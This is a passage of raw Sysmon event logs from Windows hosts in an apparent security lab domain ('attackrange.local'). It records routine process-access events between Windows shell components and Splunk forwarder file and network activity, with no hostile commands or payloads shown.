07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048390Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048389Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048388Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048387Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048386Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001048385Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:41.627{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E0E2DB695F735E1D7BB267B4A32201B,SHA256=D0A7E2DF850F72A238ABE84721B74BAF0F5182E06A10BFB2C1EBE7267D0FB8C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807480Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:41.118{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AF50C001EFEFE6FB33F89DD7D58EDD1,SHA256=A1803B1126FC13809B19323596443EBC32250C0F483C6507068EA38CDBBE984E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048451Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.697{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6025085DB6F309E4325C2AAA81D6358A,SHA256=1467509AF0C3FA246BA700FEA2DA3083A1C21D502EE39322946C5ED5297BBA7C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807482Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:41.297{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57257-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807481Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:42.118{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF7D84B885A71921F74A0140DA7EC2F9,SHA256=D9A0B273498D3704B153D2DB09C842CB731C8D1F72C12AF032F2444C41152B6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048450Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.326{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48DDB00A33134D497333BA14FEA7BAEA,SHA256=69C712BA86B74510B6954C0AEAD5EAEF60A86B4229F04D1F865396399076F802,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048449Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.261{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048448Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.261{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048447Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.259{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048446Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.259{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048445Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.242{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048444Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.242{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001048443Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.242{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048442Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.242{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048441Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.242{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048440Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.242{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048439Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.242{466BC892-32D3-60E8-770B-00000000CF01}635610012C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048438Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.242{466BC892-32D3-60E8-770B-00000000CF01}635610012C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048437Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 